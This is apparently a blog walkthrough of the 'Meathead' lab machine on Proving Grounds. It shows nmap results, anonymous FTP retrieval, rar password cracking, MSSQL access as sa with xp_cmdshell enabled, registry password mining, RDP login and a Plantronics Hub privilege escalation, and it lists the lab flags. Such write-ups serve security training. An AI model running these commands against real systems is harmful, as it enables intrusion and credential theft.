Proving Grounds | Meathead

Proving Grounds | Meathead

25 days ago   •   10 min read

By 0xBEN
Table of contents

Nmap Results

# Nmap 7.92 scan initiated Mon Aug 29 23:02:31 2022 as: nmap -T5 -p80,135,139,445,1221,1435,3389,5985 -A -oA scan-all -Pn 192.168.179.70
Nmap scan report for 192.168.179.70
Host is up (0.081s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Plantronics
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-27-20  07:02PM                18866 Elementum Supremum.docx
| 04-27-20  07:02PM               764176 file_example_MP3_700KB.mp3
| 04-27-20  07:02PM                15690 img.jpg
| 04-27-20  07:02PM                  302 MSSQL_BAK.rar
| 04-27-20  07:02PM                  548 palindromes.txt
|_04-27-20  07:02PM                45369 server.jpg
| ftp-syst: 
|_  SYST: Windows_NT
1435/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-28T05:05:51
|_Not valid after:  2052-08-28T05:05:51
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
| ms-sql-ntlm-info: 
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|_  Product_Version: 10.0.17763
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: MEATHEAD
|   NetBIOS_Domain_Name: MEATHEAD
|   NetBIOS_Computer_Name: MEATHEAD
|   DNS_Domain_Name: Meathead
|   DNS_Computer_Name: Meathead
|   Product_Version: 10.0.17763
|_  System_Time: 2022-08-30T03:03:19+00:00
| ssl-cert: Subject: commonName=Meathead
| Not valid before: 2022-08-27T05:05:45
|_Not valid after:  2023-02-26T05:05:45
|_ssl-date: 2022-08-30T03:03:59+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-08-30T03:03:23
|_  start_date: N/A

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   80.90 ms 192.168.49.1
2   81.25 ms 192.168.179.70

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 23:04:00 2022 -- 1 IP address (1 host up) scanned in 89.54 seconds





Service Enumeration

TCP/139,445

Test for anonymous SMB enumeration.



TCP/1221

Test Anonymous FTP Access

Microsoft ftpd is running on this port. The nmap scan results show that anonymous logon is enabled.

Let's make a directory and store the files there.

mkdir ftp-files
ftp> lcd ftp-files
ftp> prompt
ftp> mget *



Analyze the Files

MSSQL_BAK.rar

We can try and crack it with john by using the rar2john tool.

rar2john MSSQL_BAK.rar > hash.txt
john --wordlist=rockyou.txt hash.txt

Let's see if we can open the archive now.

Looks like some database admin credentials, possibly. sa:EjectFrailtyThorn425 .



TCP/80

Looking at the icon on this page, I'm not familiar with it. But, the URL for the image is: http://192.168.179.70/images/plt-hub-orange.png . I search Google for the Plantronics Hub logo and get a match.

I check searchsploit for anything related to this product.

searchsploit plantronics

Looks like there are some privilege escalation possibilities to keep in our pocket for later.

Plantronics Hub 3.13.2 - Local Privilege Escalation                  | windows/local/47845.txt
Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (M | windows/local/47944.rb



Gobuster Enumeration

gobuster dir -u http://192.168.179.70/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x aspx,asp,html -r -o gobuster80.txt

Nothing interesting with the gobuster enumeration.



TCP/1435

The nmap scan identifies this as Microsoft SQL Server 2017 14.00.1000 . Now that we have DB credentials from the backup file, let's use Impacket's mssqlclient.py to connect to the database and see what we can do.

mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70

Once we're connected, we can run enable_xp_cmdshell to allow command execution (I found it was disabled when I first tested the client connection).

SQL> help
SQL> enable_xp_cmdshell
SQL> RECONFIGURE
SQL> xp_cmdshell whoami





Exploit

Details

The path to code execution on the host went as follows:

  1. Anonymous login to the FTP server allowed for retrieval of a MSSQL backup
  2. The backup was compressed in a password-protected .rar archive with a crackable password
  3. Given the credentials in the backup file, we can execute arbitrary commands on the host



Gaining a Foothold

Enable XP_CMDSHELL

We can use Impacket's mssqlclient.py script to connect to the MSSQL server. Then, we'll need to enable xp_cmdshell to run commands on the host.

mssqlclient.py -port 1435 'sa:EjectFrailtyThorn425@192.168.179.70

SQL> enable_xp_cmdshell
SQL> EXEC xp_cmdshell 'whoami'
SQL> EXEC xp_cmdshell 'ipconfig'



No Reverse Shell

I spent far too long trying a mix of different delivery mechanisms and payload types to get a reverse shell on the target. I tried delivering with:

  • smbserver.py
  • Python web server

And, I verified the payloads made it on the target. Just no matter what I tried – encodings, scripts, binaries, nothing worked, which was frustrating to say the least.



Password Mining

I had look around the file system for configuration files that might have a password, but no luck. So, I turned to the registry. My first registry search returned nothing.

EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f password /t REG_SZ /s'

However, this search produced an interesting find.

EXEC xp_cmdshell 'reg query HKLM\SYSTEM /f pass /t REG_SZ /s'

TwilightAirmailMuck234

Now, if we look at the output of the net user command, we can summarize that this is either Administrator 's or jane 's password. We can test the password with smbclient .

Jane doesn't have access to either of these privileged shares, but we do know her password and RDP is open on this host.

xfreerdp /v:'192.168.179.70' /u:'jane' /p:'TwilightAirmailMuck234'





Post-Exploit Enumeration

Current User

Click to expand
USER INFORMATION
----------------

User Name     SID
============= =============================================
meathead\jane S-1-5-21-4244463105-466391970-2126029592-1000


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users           Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON  Well-known group S-1-5-14     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled



OS & Kernel

Click to expand
Host Name:                 MEATHEAD
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-70000-00000-AA207
Original Install Date:     4/27/2020, 9:52:21 PM
System Boot Time:          8/28/2022, 5:05:34 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,053 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,765 MB
Virtual Memory: In Use:    2,034 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\MEATHEAD
Hotfix(s):                 7 Hotfix(s) Installed.
                           [01]: KB4552924
                           [02]: KB4462930
                           [03]: KB4494174
                           [04]: KB4512577
                           [05]: KB4537759
                           [06]: KB4549947
                           [07]: KB4551853
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.179.70
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.



Users

Click to expand
User accounts for \\MEATHEAD

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
jane                     WDAGUtilityAccount



Groups

Click to expand
Aliases for \\MEATHEAD

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$WIN-OHNBE5J07GP
*Storage Replica Administrators
*System Managed Accounts Group
*Users



Network

Interfaces
Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.179.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.179.254


ARP Table
N/A


Routes
N/A


Open Ports
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1221           0.0.0.0:0              LISTENING       2328
  TCP    0.0.0.0:1435           0.0.0.0:0              LISTENING       3424
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1008
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1060
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1348
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2044
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2264
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       604
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       616
  TCP    127.0.0.1:32017        0.0.0.0:0              LISTENING       6360
  TCP    127.0.0.1:32018        0.0.0.0:0              LISTENING       6360
  TCP    192.168.179.70:139     0.0.0.0:0              LISTENING       4
  TCP    [::]:80                [::]:0                 LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       852
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:1221              [::]:0                 LISTENING       2328
  TCP    [::]:1435              [::]:0                 LISTENING       3424
  TCP    [::]:3389              [::]:0                 LISTENING       1008
  TCP    [::]:5985              [::]:0                 LISTENING       4
  TCP    [::]:47001             [::]:0                 LISTENING       4
  TCP    [::]:49664             [::]:0                 LISTENING       484
  TCP    [::]:49665             [::]:0                 LISTENING       1060
  TCP    [::]:49666             [::]:0                 LISTENING       1348
  TCP    [::]:49667             [::]:0                 LISTENING       2044
  TCP    [::]:49668             [::]:0                 LISTENING       2264
  TCP    [::]:49669             [::]:0                 LISTENING       604
  TCP    [::]:49670             [::]:0                 LISTENING       616


Ping Sweep
N/A



Processes

Click to expand
No interesting process or command line values.



Services

Click to expand
No unquoted service paths. The Plantronics service is probably going to be the privilege escalation path, as discovered earlier in the service enumeration. 



Scheduled Tasks

Click to expand
No interesting scheduled tasks, at least as can be seen by the current user.



Interesting Files

Checked for configuration files and other files that might contain passwords but was unable to find anything substantial.





Privilege Escalation

Writable Privileged Directory

Using the information found in my earlier service enumeration, we know that the installed version of Plantronics Hub is vulnerable to a local privilege escalation exploit. Copy the exploit to your working directory and have a look over the exploit details.

searchsploit -m 47845
less 47845.txt

You'll note that the exploit tells us to place a MajorUpgrade.config file in C:\ProgramData\Plantronics\Spokes3G , with a crafted payload in the configuration file. Let's double check the ACL on the directory.

Indeed, it looks like BUILTIN\Users – an unprivileged group – has write-access to a directory they shouldn't.



Execute the Exploit

I wrote a PowerShell script to automate the process. When I tried running the commands individually, the file would be deleted too quickly and SYSTEM shell would not spawn. So, I wrote a script that would prop the file open while the payload is written to it and spawn the shell. Usage examples are provided in the repo.

GitHub - 0xBEN/Get-Spokes3GSystem: PowerShell script to aid in the automation of local privilege escalation path with the SpokesUpdateService
PowerShell script to aid in the automation of local privilege escalation path with the SpokesUpdateService - GitHub - 0xBEN/Get-Spokes3GSystem: PowerShell script to aid in the automation of local p...

Download the script file to the target and run the script.

Default payload: cmd.exe
Custom payload: powershell.exe





Flags

C:\users\jane\Desktop\local.txt
32d5ddc986de6979a730ef057c17df82


C:\users\Administrator\Desktop\local.txt
7ab84514f5dff5f19ec54f23b6b4bfc7

Spread the word

Keep reading